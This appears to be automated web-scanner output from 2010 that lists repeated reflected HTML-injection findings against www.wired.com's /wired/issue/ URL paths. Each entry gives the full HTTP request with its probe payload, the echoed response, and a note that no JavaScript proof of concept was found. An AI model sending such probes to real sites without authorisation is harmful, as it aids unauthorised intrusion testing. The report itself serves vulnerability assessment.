GET /wired/issuea7378"><a>52f5bbca6a4/15-10/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:09:42 GMT Date: Mon, 22 Nov 2010 01:05:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issuea7378"><a>52f5bbca6a4 c_15-10"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e79ad"><a>9471c5b3eb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/15-10e79ad"><a>9471c5b3eb/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29351 Vary: Accept-Encoding Cache-Control: max-age=234 Expires: Mon, 22 Nov 2010 01:10:22 GMT Date: Mon, 22 Nov 2010 01:06:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_15-10e79ad"><a>9471c5b3eb"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac69b"><a>f9de393d2ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issueac69b"><a>f9de393d2ac/15-11/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=227 Expires: Mon, 22 Nov 2010 01:09:01 GMT Date: Mon, 22 Nov 2010 01:05:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issueac69b"><a>f9de393d2ac c_15-11"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24d8d"><a>4c6530b8720 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/15-1124d8d"><a>4c6530b8720/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=219 Expires: Mon, 22 Nov 2010 01:09:40 GMT Date: Mon, 22 Nov 2010 01:06:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_15-1124d8d"><a>4c6530b8720"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a2a5"><a>a67b1f7302a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue9a2a5"><a>a67b1f7302a/15-12/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:09:15 GMT Date: Mon, 22 Nov 2010 01:05:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue9a2a5"><a>a67b1f7302a c_15-12"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d16b8"><a>544844ba869 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/15-12d16b8"><a>544844ba869/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:10:11 GMT Date: Mon, 22 Nov 2010 01:06:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_15-12d16b8"><a>544844ba869"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec8eb"><a>8d7d3783758 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issueec8eb"><a>8d7d3783758/16-01/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=217 Expires: Mon, 22 Nov 2010 01:08:42 GMT Date: Mon, 22 Nov 2010 01:05:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issueec8eb"><a>8d7d3783758 c_16-01"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d800f"><a>31d49709012 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/16-01d800f"><a>31d49709012/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:10:00 GMT Date: Mon, 22 Nov 2010 01:06:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_16-01d800f"><a>31d49709012"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d5c8"><a>d90cdd2b885 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue8d5c8"><a>d90cdd2b885/16-02/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:09:15 GMT Date: Mon, 22 Nov 2010 01:05:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue8d5c8"><a>d90cdd2b885 c_16-02"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25886"><a>49703bfc46d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/16-0225886"><a>49703bfc46d/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:10:02 GMT Date: Mon, 22 Nov 2010 01:06:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_16-0225886"><a>49703bfc46d"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e9dc"><a>6371e337d69 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue1e9dc"><a>6371e337d69/16-03/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=236 Expires: Mon, 22 Nov 2010 01:08:58 GMT Date: Mon, 22 Nov 2010 01:05:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue1e9dc"><a>6371e337d69 c_16-03"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0de6"><a>6137b71f920 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/16-03b0de6"><a>6137b71f920/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=219 Expires: Mon, 22 Nov 2010 01:09:26 GMT Date: Mon, 22 Nov 2010 01:05:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_16-03b0de6"><a>6137b71f920"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37019"><a>e9e4b1f3822 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue37019"><a>e9e4b1f3822/16-04/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=225 Expires: Mon, 22 Nov 2010 01:08:48 GMT Date: Mon, 22 Nov 2010 01:05:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue37019"><a>e9e4b1f3822 c_16-04"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4f74"><a>652de2d69ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/16-04b4f74"><a>652de2d69ff/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=237 Expires: Mon, 22 Nov 2010 01:09:51 GMT Date: Mon, 22 Nov 2010 01:05:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_16-04b4f74"><a>652de2d69ff"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8725"><a>8420d93529b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issuec8725"><a>8420d93529b/16-05/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:09:03 GMT Date: Mon, 22 Nov 2010 01:05:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issuec8725"><a>8420d93529b c_16-05"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7284"><a>f4e7c102648 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/16-05d7284"><a>f4e7c102648/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:09:56 GMT Date: Mon, 22 Nov 2010 01:05:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_16-05d7284"><a>f4e7c102648"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f50eb"><a>0f522718632 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issuef50eb"><a>0f522718632/16-06 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=230 Expires: Mon, 22 Nov 2010 01:08:35 GMT Date: Mon, 22 Nov 2010 01:04:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issuef50eb"><a>0f522718632 c_16-06"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91af4"><a>0d0253827d5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/16-0691af4"><a>0d0253827d5 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:09:45 GMT Date: Mon, 22 Nov 2010 01:05:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_16-0691af4"><a>0d0253827d5"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dd8a"><a>96480a8cd6d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
